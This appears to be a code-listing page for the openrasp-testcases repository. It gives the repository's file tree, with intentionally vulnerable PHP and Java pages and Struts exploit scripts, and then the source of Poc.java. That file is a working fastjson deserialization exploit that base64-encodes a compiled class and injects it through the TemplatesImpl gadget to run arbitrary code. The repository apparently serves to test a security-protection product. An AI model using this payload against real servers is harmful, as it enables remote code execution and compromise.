java source code of Poc

Project: openrasp-testcases (GitHub Link)

openrasp-testcases-master
- php
  - vulns
    - 006-leak.php
    - 018-assert.php
    - 019-file-delete.php
    - classes
      - header.php
    - 015-webshell-dropper.php
    - 004-command-1.php
    - 002-file-read.php
    - 018-eval.php
    - 011-ssrf-curl.php
    - index.php
    - 011-ssrf-file.php
    - 016-webshell-include.php
    - uploads
      - .keep
    - 014-webshell-eval.php
    - 004-command-2.php
    - 005-file-write.php
    - 009-file-rename.php
    - 013-webshell-array_walk.php
    - .gitignore
    - 010-file-include.php
    - 001-dir.php
    - 008-file-upload.php
    - 017-xss.php
    - 012-mysqli.php
    - assets
      - js
        angular.min.js
      - css
        bootstrap.min.css
- LICENSE
- java
  - fastjson
    - src
      - main
        main1.iml
        java
        person
        SerializeToFlatFile.java
        Test.java
        Person.java
        FastJsonServlet.java
        Poc.java
        webapp
        index.jsp
        WEB-INF
        web.xml
    - fastjson.iml
    - pom.xml
  - S2-013
    - index.jsp
    - META-INF
      - war-tracker
      - MANIFEST.MF
    - WEB-INF
      - classes
        struts.xml
      - web.xml
  - CVE-2019-12384
    - src
      - main
        java
        person
        JacksonServlet.java
        Poc.java
        webapp
        index.jsp
        WEB-INF
        web.xml
    - pom.xml
  - S2-012
    - index.jsp
    - META-INF
      - war-tracker
      - MANIFEST.MF
    - WEB-INF
      - classes
        struts.xml
      - web.xml
  - S2-016
    - src
      - main
        resources
        struts.xml
        java
        com
        demo
        action
        DefaultAction.java
        webapp
        index.jsp
        WEB-INF
        web.xml
    - pom.xml
    - META-INF
      - war-tracker
      - MANIFEST.MF
    - .gitignore
  - S2-001
    - index.jsp
    - META-INF
      - war-tracker
      - MANIFEST.MF
    - WEB-INF
      - classes
        struts.xml
      - web.xml
    - welcome.jsp
  - S2-008
    - cookie.jsp
    - devmode.jsp
    - META-INF
      - war-tracker
      - MANIFEST.MF
    - WEB-INF
      - classes
        struts.xml
      - web.xml
    - index.html
  - S2-007
    - index.jsp
    - META-INF
      - war-tracker
      - MANIFEST.MF
    - WEB-INF
      - classes
        struts.xml
        UserAction-validation.xml
      - web.xml
    - welcome.jsp
  - S2-029
    - index.jsp
    - META-INF
      - war-tracker
      - MANIFEST.MF
    - WEB-INF
      - classes
        struts.xml
      - web.xml
  - CVE-2019-10173
    - src
      - main
        webapp
        index.jsp
        WEB-INF
        web.xml
    - pom.xml
    - .gitignore
  - vulns
    - src
      - main
        webapp
        007-xxe.jsp
        006-leak-1.jsp
        006-leak-2.jsp
        010-jstl-import.jsp
        017-xss.jsp
        007-xxe-dom4j.jsp
        009-deserialize.jsp
        reports
        test.xml
        008-file-upload.jsp
        hibernate_conf
        hibernate.cfg.xml
        007-xxe-jdom.jsp
        018-loadlibrary.jsp
        004-command-1.jsp
        013-multipart-mysql.jsp
        mybatis_conf
        mappers
        vuln-mapper.xml
        mybatis-config.xml
        019-file-delete.jsp
        011-ssrf-httpclient.jsp
        012-jdbc-hsqldb.jsp
        004-command-2.jsp
        002-file-read.jsp
        index.jsp
        011-ssrf-urlconnection.jsp
        WEB-INF
        web.xml
        005-file-write.jsp
        007-xxe-stax.jsp
        011-ssrf-commons-httpclient.jsp
        012-hibernate.jsp
        012-mybatis.jsp
        012-jdbc-mysql.jsp
        001-dir-1.jsp
        011-ssrf-okhttp3.jsp
        007-xxe-sax.jsp
        011-ssrf-okhttp.jsp
        assets
        js
        angular.min.js
        css
        bootstrap.min.css
        017-xss-chunked.jsp
    - pom.xml
    - .gitignore
  - dubbo-demo
    - pom.xml
    - dubbo-consumer
      - src
        main
        resources
        applicationContext.xml
        consumer.xml
        java
        com
        dubbo
        consumer
        UserController.java
        Consumer.java
        webapp
        index.jsp
        WEB-INF
        main.jsp
        web.xml
      - pom.xml
    - dubbo-provider
      - src
        main
        resources
        applicationContext.xml
        provider.xml
        java
        com
        dubbo
        provider
        main
        Provider.java
        serviceImpl
        UserService.java
        webapp
        WEB-INF
        web.xml
      - pom.xml
    - dubbo-interface
      - src
        main
        java
        com
        dubbo
        demo_interface
        api
        IUserService.java
      - pom.xml
    - .gitignore
  - sqlcase
    - src
      - main
        java
        com
        baidu
        rasp
        MssqlServlet.java
        DB2Servlet.java
        OracleServlet.java
        SqliteServlet.java
        PgServlet.java
        SQLInterface.java
        MysqlServlet.java
        BaseSqlServlet.java
      - webapp
        index.jsp
        WEB-INF
        sqlcase.properties
        lib
        web.xml
    - pom.xml
    - readme.md
    - .gitignore
  - S2-032
    - index.jsp
    - META-INF
      - war-tracker
      - MANIFEST.MF
    - WEB-INF
      - classes
        struts.xml
      - web.xml
  - vulns-servlet
    - src
      - main
        java
        com
        baidu
        rasp
        Directory2.java
        Xxe_dom4j.java
        OkHttp.java
        SqlPolicy.java
        Xxe_sax.java
        SqlAccess.java
        HttpClient.java
        Directory1.java
        ReadFile.java
        OkHttp3.java
        Body_Xss.java
        Mysql.java
        WriteFile.java
        Xxe_jdom.java
        FileUpload.java
        HttpCommonClient.java
        Log.java
        Multipart_mysql.java
        CommandEcho.java
        Deserialization.java
        Command.java
        Xxe_stax.java
        SqlException.java
        Ognl.java
        MysqlPrepared.java
        HttpURLConnection.java
        Xxe_dom.java
      - webapp
        007-xxe.jsp
        006-leak-1.jsp
        014-sql-exception.jsp
        006-leak-2.jsp
        010-jstl-import.jsp
        017-xss.jsp
        007-xxe-dom4j.jsp
        001-dir-2.jsp
        016-ognl.jsp
        009-deserialize.jsp
        008-file-upload.jsp
        007-xxe-jdom.jsp
        004-command-1.jsp
        015-sql-access.jsp
        013-multipart-mysql.jsp
        018-sql-policy.jsp
        011-ssrf-httpclient.jsp
        004-command-2.jsp
        002-file-read.jsp
        index.jsp
        011-ssrf-urlconnection.jsp
        WEB-INF
        web.xml
        005-file-write.jsp
        007-xxe-stax.jsp
        011-ssrf-commons-httpclient.jsp
        012-jdbc-mysql.jsp
        001-dir-1.jsp
        011-ssrf-okhttp3.jsp
        007-xxe-sax.jsp
        011-ssrf-okhttp.jsp
    - pom.xml
    - .gitignore
  - spel
    - src
      - main
        webapp
        index.jsp
        WEB-INF
        web.xml
    - pom.xml
    - .gitignore
  - freemarker
    - src
      - main
        java
        com
        baidu
        openrasp
        FMServlet.java
        Car.java
        webapp
        index.ftl
        META-INF
        context.xml
        WEB-INF
        web.xml
    - pom.xml
    - freemarker.iml
    - .gitignore
  - fastjson-1.2.60
    - src
      - main
        main1.iml
        java
        person
        SerializeToFlatFile.java
        Test.java
        Person.java
        FastJsonServlet.java
        Poc.java
        webapp
        index.jsp
        WEB-INF
        web.xml
      - resources
    - pom.xml
  - .gitignore
  - wxpay-xxe
    - src
      - main
        webapp
        index.jsp
        WEB-INF
        lib
        web.xml
    - pom.xml
    - .gitignore
  - S2-015
    - others.jsp
    - META-INF
      - war-tracker
      - MANIFEST.MF
    - WEB-INF
      - classes
        struts.xml
      - web.xml
    - welcome.jsp
    - index.html
    - menu.jsp
- tools
  - s2-012.py
  - s2-045.py
  - s2-016.py
  - s2-007.py
  - s2-013.py
  - s2-015.py
  - s2-032.py
  - s2-001.py
  - s2-008.py
  - s2-029.py
- readme.md
- .gitignore
- build.sh

package person;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.io.IOUtils;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;

public class Poc {

    public static String readClass(String cls) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            IOUtils.copy(new FileInputStream(new File(cls)), bos);
        } catch (IOException e) {
            e.printStackTrace();
        }
        return Base64.encodeBase64String(bos.toByteArray());

    }

    public static void testAutoTypeDeny(String rootPath) throws Exception {
        ParserConfig config = new ParserConfig();
        final String fileSeparator = System.getProperty("file.separator");
        final String evilClassPath = rootPath + fileSeparator + "WEB-INF" + fileSeparator + "classes"
                + fileSeparator + "person" + fileSeparator + "Test.class";
        String evilCode = readClass(evilClassPath);
        final String nastyClass = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        String text1 = "{\"@type\":\"" + nastyClass
                + "\",\"_bytecodes\":[\"" + evilCode + "\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ },"
                + "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n";
        System.out.println(text1);
        Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);
    }

    public static void run(String rootPath) {
        try {
            testAutoTypeDeny(rootPath);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}